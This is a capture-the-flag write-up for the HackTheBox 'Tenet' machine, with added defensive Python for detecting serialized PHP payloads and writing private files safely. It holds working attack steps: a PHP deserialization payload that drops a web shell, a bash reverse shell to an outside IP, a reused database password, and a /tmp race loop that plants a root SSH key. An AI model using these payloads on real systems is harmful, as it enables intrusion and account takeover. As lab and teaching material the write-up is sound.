HTB Tenet
Writeup for Tenet box on HackTheBox.eu
Initial Enumeration

```
nmap -sC -sV -vv -oA tcp 10.129.80.224 -Pn
```

Found WordPress at http://10.129.80.224/wordpress/

WordPress seems to be configured to resolve links to http://tenet.htb/, so add that name to /etc/hosts.
wpscan user enumeration output:

```
[+] protagonist
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://tenet.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] neil
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```
Found:

- http://rotas.htb/sator.php
- http://rotas.htb/users.txt

Also found http://10.129.88.28/sator.php.bak, a backup copy that lets us download the source code of sator.php.
The exploit
```php
<?php
// Mirrors the DatabaseExport class from sator.php: __destruct() writes $data
// into $user_file, so a crafted serialized object becomes an arbitrary file write.
class DatabaseExport
{
    public $user_file = 'sh.php';
    public $data = '<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this->data = '';
    }

    public function __destruct()
    {
        // Runs when the object is destroyed, i.e. right after unserialize() on the target
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
        echo '[+] Database updated <br>';
        // echo 'Gotta get this working properly...';
    }
}

// Print the serialized form of the object to paste into the request
$d = serialize(new DatabaseExport());
print_r($d);
```
The above file generates a serialized version of the DatabaseExport class, which we then send to sator.php in the arepo parameter:

```
curl 'http://10.129.88.28/sator.php?arepo=O:14:"DatabaseExport":2:{s:9:"user_file";s:6:"sh.php";s:4:"data";s:88:"<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>";}'
```

The arepo parameter should be URL-encoded; it is shown unencoded here for readability.
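The root cause here is sator.php passing the attacker-controlled arepo parameter straight into unserialize(), which lets a serialized object's __destruct() run on the server; in PHP the fix is to reject objects entirely with unserialize($input, ['allowed_classes' => false]) or to exchange JSON instead. From the detection side, such payloads are easy to spot in access logs because a serialized PHP object always starts with O:<length>:"<ClassName>":. The Python below is an added example of that check, not code from the box or the writeup; the log lines, hosts and timestamps are constructed, and the object in the first line carries only a harmless echo rather than the page's web shell.

```python
"""Detect PHP serialized-object payloads in web-server access logs.

Added example (not part of the writeup or the box): flags requests whose
query string carries a serialized PHP object, the exact input shape that
reaches a vulnerable unserialize() call, and whether the object embeds PHP code.
"""
import re
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# Apache/nginx combined-log request line: client, timestamp, method and target
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Start of a serialized PHP object: O:<name length>:"<ClassName>":<property count>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z_][A-Za-z0-9_\\]*)":\d+:\{')
# PHP code smuggled inside a string property points at a file-write gadget
PHP_TAG_RE = re.compile(r"<\?php", re.IGNORECASE)


def _encoded(payload):
    """URL-encode a raw payload the way a client would send it in a query string."""
    return quote(payload, safe="")


# Constructed sample log lines (hosts, timestamps and payloads are made up):
# line 1 carries an object with embedded PHP, line 2 a plain serialized array,
# line 3 an ordinary WordPress request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /sator.php?arepo='
    + _encoded('O:14:"DatabaseExport":2:{s:9:"user_file";s:6:"sh.php";s:4:"data";s:13:"<?php echo 1;";}')
    + ' HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2021:10:00:01 +0000] "GET /sator.php?arepo='
    + _encoded('a:1:{i:0;s:3:"foo";}')
    + ' HTTP/1.1" 200 300',
    '10.0.0.7 - - [01/Jan/2021:10:00:02 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 4096',
]


def scan_line(line):
    """Return a list of findings for one log line (empty if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decoded once already; decode again to catch double-encoded payloads
        decoded = unquote_plus(value)
        obj = PHP_OBJECT_RE.search(decoded)
        if obj:
            findings.append({
                "ip": m.group("ip"),
                "path": parts.path,
                "param": name,
                "class": obj.group(1),
                "has_php_code": bool(PHP_TAG_RE.search(decoded)),
            })
    return findings


def scan_log(lines):
    """Scan many log lines and return every finding in order."""
    findings = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} param={f['param']} class={f['class']} php_code={f['has_php_code']}")
```

Only the object header is matched, so a serialized array (line 2) is not flagged; in practice the class name is the useful pivot, since any class with a __destruct or __wakeup method that touches the filesystem is a gadget worth reviewing.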
Get a reverse shell via the web shell uploaded in the previous step:

```
curl 'http://10.129.88.28/sh.php' -d 's=/bin/bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.58/8443+0>%261"'
```
Enumeration
MySQL credentials in wp-config.php:

```php
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'neil' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );
```

The same password works for SSH as neil.
User enumeration
Privilege escalation
Read / write race condition

```
cd /tmp
while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAA.... [email protected]" | tee ssh-*; done
```

With the while loop running in the background, we then run the command with sudo, which adds our SSH key to the root user.
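The loop above wins a race against a privileged script that writes to, and then reads back, a predictably named file in the shared, world-writable /tmp. The defensive pattern is the opposite on every point: never stage privileged data in a shared directory, create the file with O_EXCL and mode 0600 under an unpredictable name in the destination directory itself, verify it through the open descriptor rather than by path, and rename it into place atomically. The Python below is an added example of that pattern, not code from the box or the writeup; the authorized_keys file name and the key string in the demo are constructed assumptions.

```python
"""Race-resistant installation of a private file such as authorized_keys.

Added example (not from the box or the writeup). The staging file is created
by mkstemp (O_CREAT|O_EXCL, mode 0600, random name) in the target directory,
checked through its descriptor, then atomically renamed over the destination.
"""
import os
import shutil
import stat
import tempfile


def write_private_file(dest_path, content):
    """Write content to dest_path without ever exposing a predictable, writable temp name."""
    dest_path = os.path.abspath(dest_path)
    dest_dir = os.path.dirname(dest_path)
    # Same directory as the target so the final rename is atomic and never crosses filesystems
    fd, tmp_path = tempfile.mkstemp(prefix=".authorized_keys.", dir=dest_dir)
    try:
        st = os.fstat(fd)  # inspect the object we opened, not whatever the path now points at
        if not (stat.S_ISREG(st.st_mode) and st.st_uid == os.geteuid() and st.st_nlink == 1):
            raise RuntimeError("staging file is not a fresh regular file owned by us")
        data = content.encode()
        while data:
            written = os.write(fd, data)
            data = data[written:]
        os.fsync(fd)
        os.close(fd)
        fd = -1
        os.replace(tmp_path, dest_path)  # atomic: readers see the old file or the new one
    except Exception:
        if fd != -1:
            os.close(fd)
        try:
            os.unlink(tmp_path)
        except FileNotFoundError:
            pass
        raise
    return dest_path


def check_private_file(path):
    """Return the problems that make `path` unsafe to trust as a private file (empty if none)."""
    problems = []
    st = os.lstat(path)  # lstat so a symlink planted at the path is seen as such
    if stat.S_ISLNK(st.st_mode):
        problems.append("symlink")
    elif not stat.S_ISREG(st.st_mode):
        problems.append("not a regular file")
    if st.st_uid != os.geteuid():
        problems.append("owned by another user")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("group/world writable")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH:
        problems.append("parent directory is world-writable")  # the /tmp situation
    return problems


def read_private_file(path):
    """Read the file only after it passes the ownership and permission checks."""
    problems = check_private_file(path)
    if problems:
        raise PermissionError(", ".join(problems))
    with open(path) as fh:
        return fh.read()


def demo():
    """Exercise the helpers in a throwaway directory and report what was observed."""
    workdir = tempfile.mkdtemp(prefix="keydemo.")  # mode 0700, so not a shared directory
    target = os.path.join(workdir, "authorized_keys")
    key = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA constructed@example\n"  # constructed, not a real key
    try:
        write_private_file(target, key)
        result = {
            "mode": stat.S_IMODE(os.stat(target).st_mode),
            "content": read_private_file(target),
            "problems_clean": check_private_file(target),
        }
        os.chmod(target, 0o666)  # simulate a careless chmod; the checker must now refuse it
        result["problems_after_chmod"] = check_private_file(target)
    finally:
        shutil.rmtree(workdir)
    return result


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The check on st_nlink and the fstat on the descriptor are what close the window the page's loop exploits: even if an attacker pre-creates or swaps a file at a guessed name, the privileged writer only ever trusts an inode it created itself, and the reader refuses anything sitting in a world-writable directory.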